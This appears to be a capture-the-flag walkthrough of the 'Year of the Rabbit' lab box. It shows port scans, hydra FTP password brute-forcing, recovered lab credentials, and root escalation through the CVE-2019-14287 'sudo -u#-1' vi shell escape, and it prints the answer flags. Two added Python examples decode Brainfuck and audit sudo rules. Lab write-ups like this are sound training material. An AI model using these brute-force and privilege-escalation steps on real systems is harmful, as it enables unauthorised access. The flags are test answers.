Time to enter the Warren ...
Let's have a good start to the new year!
Can you hack into the Year of the Rabbit box without falling down a hole?
(Please make sure your volume is turned up!)
What is the user flag?
Run a port scan
┌─[cyber@cyber]─[~]
└──╼ $sudo nmap -sV -sC -Pn -T5 10.10.80.158
[sudo] password for cyber:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-17 00:05 WIT
Warning: 10.10.80.158 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.80.158
Host is up (0.26s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
| 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
| 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_ 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.00 seconds
Enter the machine IP in the browser.
Brute-force directories with Gobuster or Dirbuster
┌─[cyber@cyber]─[~]
└──╼ $gobuster dir -u http://10.10.80.158 -w node-dirbuster/lists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[ ] Url: http://10.10.80.158
[ ] Threads: 10
[ ] Wordlist: node-dirbuster/lists/directory-list-2.3-medium.txt
[ ] Status codes: 200,204,301,302,307,401,403
[ ] User Agent: gobuster/3.0.1
[ ] Timeout: 10s
===============================================================
2021/03/17 00:10:44 Starting gobuster
===============================================================
/assets (Status: 301)
Progress: 1509 / 220562 (0.68%)^C
[ ] Keyboard interrupt detected, terminating.
===============================================================
2021/03/17 00:11:35 Finished
===============================================================
Open the /assets directory in the browser.
Be careful not to get trapped by the video. Next, click style.css; in this CSS file one directory is visible:
Then go into that directory.
At this step, make sure JavaScript is disabled in the browser (set it from true to false).
Once it is disabled, a page like the one below appears:
Pay close attention here, because there is one hidden directory.
Right-click, then Inspect Element.
Enter that hidden directory in the browser.
Then download the image Hot_Babe.png.
We will look for something inside that image, whatever it may be.
Run the following commands:
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $ls
Hot_Babe.png
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $strings Hot_Babe.png | grep 'user'
Eh, you've earned this. Username for FTP is ftpuser
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $strings Hot_Babe.png | grep 'pass'
One of these is the password:
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $strings Hot_Babe.png > password
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $cat password
Ms^ *Q4
XDV$
Ap(*
IEND
Ot9RrG7h2~24?
Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
vTFbDzX9&Nmu?
FfF~sfu^UQZmT
8FF?iKO27b~V0
ua4W~2-@y7dE$
3j39aMQQ7xFXT
Wb4--CTc4ww*-
u6oY9?nHv84D&
0iBp4W69Gr_Yf
TS*%miyPsGV54
C77O3FIy0c0sd
O14xEhgg0Hxz1
5dpv#Pr$wqH7F
1G8Ucoce1+gS5
0plnI%f0~Jw71
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $sed -n '/^One of these is the password:$/ { :a; n; p; ba;}' password > key
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $cat key
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
vTFbDzX9&Nmu?
FfF~sfu^UQZmT
8FF?iKO27b~V0
ua4W~2-@y7dE$
3j39aMQQ7xFXT
Wb4--CTc4ww*-
u6oY9?nHv84D&
0iBp4W69Gr_Yf
TS*%miyPsGV54
C77O3FIy0c0sd
O14xEhgg0Hxz1
5dpv#Pr$wqH7F
Brute-force FTP with user = ftpuser and the password list from the file key.
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $ls
Hot_Babe.png key password
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $hydra -V -l ftpuser ftp://10.10.80.158 -P key
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-17 01:15:35
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82 login tries (l:1/p:82), ~6 tries per task
[DATA] attacking ftp://10.10.80.158:21/
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "Mou+56n%QK8sr" - 1 of 82 [child 0] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "1618B0AUshw1M" - 2 of 82 [child 1] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "5dpv#Pr$wqH7F" - 15 of 82 [child 14] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "1G8Ucoce1+gS5" - 16 of 82 [child 15] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "0plnI%f0~Jw71" - 17 of 82 [child 6] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "CR-ItthsH%9du" - 36 of 82 [child 0] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "yP9kft386bB8G" - 37 of 82 [child 1] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "A-*eE3L@!4W5o" - 38 of 82 [child 2] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "GoM^$82l&GA5D" - 39 of 82 [child 4] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "1t$4$g$I+V_BH" - 40 of 82 [child 5] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "0XxpTd90Vt8OL" - 41 of 82 [child 6] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "j0CN?Z#8Bp69_" - 42 of 82 [child 9] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "G#h~9@5E5QA5l" - 43 of 82 [child 10] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "DRWNM7auXF7@j" - 44 of 82 [child 11] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "Fw!if_=kk7Oqz" - 45 of 82 [child 12] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "92d5r$uyw!vaE" - 46 of 82 [child 13] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "c-AA7a2u!W2*?" - 47 of 82 [child 14] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "zy8z3kBi#2e36" - 48 of 82 [child 15] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "J5%2Hn+7I6QLt" - 49 of 82 [child 8] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "gL$2fmgnq8vI*" - 50 of 82 [child 0] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "Etb?i?Kj4R=QM" - 51 of 82 [child 1] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "7CabD7kwY7=ri" - 52 of 82 [child 2] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "4uaIRX~-cY6K4" - 53 of 82 [child 3] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "kY1oxscv4EB2d" - 54 of 82 [child 4] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "k32?3^x1ex7#o" - 55 of 82 [child 5] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "ep4IPQ_=ku@V8" - 56 of 82 [child 6] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "tQxFJ909rd1y2" - 57 of 82 [child 7] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "5L6kpPR5E2Msn" - 58 of 82 [child 9] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "65NX66Wv~oFP2" - 59 of 82 [child 10] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "LRAQ@zcBphn!1" - 60 of 82 [child 11] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "V4bt3*58Z32Xe" - 61 of 82 [child 12] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "ki^t!+uqB?DyI" - 62 of 82 [child 13] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "5iez1wGXKfPKQ" - 63 of 82 [child 14] (0/0)
[ATTEMPT] target 10.10.80.158 - login "ftpuser" - pass "nJ90XzX&AnF5v" - 64 of 82 [child 15] (0/0)
[21][ftp] host: 10.10.80.158 login: ftpuser password: 5iez1wGXKfPKQ
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-17 01:15:52
Log in with FTP.
There is a file Eli's_Creds.txt; look at its contents.
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $ls
"Eli's_Creds.txt" Hot_Babe.png key password
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $cat Eli's_Creds.txt
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $
The file contents turn out to be a Brainfuck program; run it to decode the message.
Now log in over SSH with the username and password that were obtained.
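Decoding the file means running it through a Brainfuck interpreter. The one below is an added example, not part of the original writeup; it ignores the spaces and line breaks a terminal dump inserts, and its DEMO_PROGRAM is a constructed program (not the page's) that prints "Hi".

```python
DEMO_PROGRAM = "+++++ ++++[ >++++ ++++< -]>.< ++++[ >++++ ++++< -]>+."  # constructed; prints "Hi"

def run_brainfuck(program: str, max_steps: int = 5_000_000) -> str:
    """Interpret a Brainfuck program and return what it prints.

    Anything that is not one of the eight commands is ignored, so text copied
    from a terminal with spaces or line breaks inserted still runs.
    """
    code = [c for c in program if c in "<>+-.,[]"]
    jump, stack = {}, []  # matching bracket positions, so loops jump in O(1)
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at command {i}")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at command {stack[-1]}")

    tape, ptr, pc, out = [0] * 30000, 0, 0, []
    for _ in range(max_steps):  # bounded so a malformed program cannot hang the decoder
        if pc >= len(code):
            return "".join(out)
        c = code[pc]
        if c == ">":
            ptr += 1
            if ptr == len(tape):
                tape.append(0)  # grow the tape rather than crash
        elif c == "<":
            if ptr == 0:
                raise IndexError("tape pointer moved below cell 0")
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF  # 8-bit cells wrap around
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == ",":
            tape[ptr] = 0  # no stdin when decoding a file: treat input as EOF (0)
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    raise RuntimeError("step limit exceeded")

if __name__ == "__main__":
    print(run_brainfuck(DEMO_PROGRAM))
```

Paste the contents of Eli's_Creds.txt in place of DEMO_PROGRAM (or read the file) to get the decoded text.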
┌─[cyber@cyber]─[~/Downloads/Rabbit]
└──╼ $ssh eli@10.10.80.158
The authenticity of host '10.10.80.158 (10.10.80.158)' can't be established.
ECDSA key fingerprint is SHA256:ISBm3muLdVA/w4A1cm7QOQQOCSMRlPdDp/x8CNpbJc8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.80.158' (ECDSA) to the list of known hosts.
eli@10.10.80.158's password:
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
eli@year-of-the-rabbit:~$
Now we look for the user flag.
Find the s3cr3t directory
eli@year-of-the-rabbit:~$ find / -type d -name 's3cr3t' 2> /dev/null
/usr/games/s3cr3t
^C
eli@year-of-the-rabbit:~$ cd /usr/games/s3cr3t
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls -lAh
total 4.0K
-rw-r--r-- 1 root root 138 Jan 23 2020 .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
eli@year-of-the-rabbit:/usr/games/s3cr3t$ cat ./.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!
Yours sincerely
-Root
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls /home/
eli gwendoline
eli@year-of-the-rabbit:/usr/games/s3cr3t$ su gwendoline
Password:
su: Authentication failure
eli@year-of-the-rabbit:/usr/games/s3cr3t$ su - gwendoline
Password:
gwendoline@year-of-the-rabbit:~$ ls
user.txt
gwendoline@year-of-the-rabbit:~$ cat user.txt
THM{1107174691af9ff3681d2b5bdb5740b1589bae53}
gwendoline@year-of-the-rabbit:~$
Answer = THM{1107174691af9ff3681d2b5bdb5740b1589bae53}
What is the root flag?
Now escalate privileges
gwendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
gwendoline@year-of-the-rabbit:~$
CVE-2019-14287 (whitesourcesoftware)
gwendoline@year-of-the-rabbit:~$ sudo --version
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3
gwendoline@year-of-the-rabbit:~$
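The rule above combines a "(ALL, !root)" runas exclusion with sudo 1.8.10p3, which is older than the 1.8.28 release that fixed CVE-2019-14287. The audit below is an added example, not part of the original writeup: it parses `sudo -l` and `sudo --version` output (the sample input is copied from the output shown above) and reports rules whose "!" exclusion the installed sudo does not enforce, with the fix (upgrade, and replace the negation with an explicit allow-list of runas users).

```python
import re

SUDO_FIXED = (1, 8, 28)  # CVE-2019-14287 is fixed from sudo 1.8.28 onward

# Sample input copied from the `sudo -l` and `sudo --version` output in this writeup.
SUDO_L_OUTPUT = """\
Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
"""
SUDO_VERSION_OUTPUT = "Sudo version 1.8.10p3\nSudoers policy plugin version 1.8.10p3\n"

# A sudoers rule line as printed by `sudo -l`: "(runas[:group]) [TAG:] command"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.*)$")

def parse_version(banner: str):
    """Return (major, minor, patch) from 'Sudo version X.Y.Z[pN]'; the pN suffix is ignored."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(x) for x in m.groups())

def negated_runas_rules(sudo_l: str):
    """Rules whose runas user list is ALL minus a '!' exclusion such as '!root'."""
    hits = []
    for line in sudo_l.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        users = m.group("runas").split(":")[0]  # drop the ':group' part if present
        names = [u.strip() for u in users.split(",")]
        if "ALL" in names and any(n.startswith("!") for n in names):
            hits.append((m.group("runas"), m.group("rest")))
    return hits

def audit(sudo_l: str, version_banner: str):
    """Findings for a defender: '!' runas exclusions, and whether this sudo enforces them."""
    version = parse_version(version_banner)
    ver = ".".join(map(str, version))
    findings = []
    for runas, cmd in negated_runas_rules(sudo_l):
        if version < SUDO_FIXED:
            findings.append(f"CVE-2019-14287: rule '({runas}) {cmd}' relies on a '!' runas "
                            f"exclusion that sudo {ver} does not enforce; upgrade to 1.8.28+ "
                            f"and list the permitted runas users explicitly")
        else:
            findings.append(f"rule '({runas}) {cmd}' uses a '!' runas exclusion; "
                            f"prefer an explicit allow-list of runas users")
    return findings

if __name__ == "__main__":
    for finding in audit(SUDO_L_OUTPUT, SUDO_VERSION_OUTPUT):
        print(finding)
```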
Exploit it with the vi shell escape :!/bin/sh
gwendoline@year-of-the-rabbit:~$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
Press Enter.
ls /root/
root.txt
cat /root/root.txt
THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}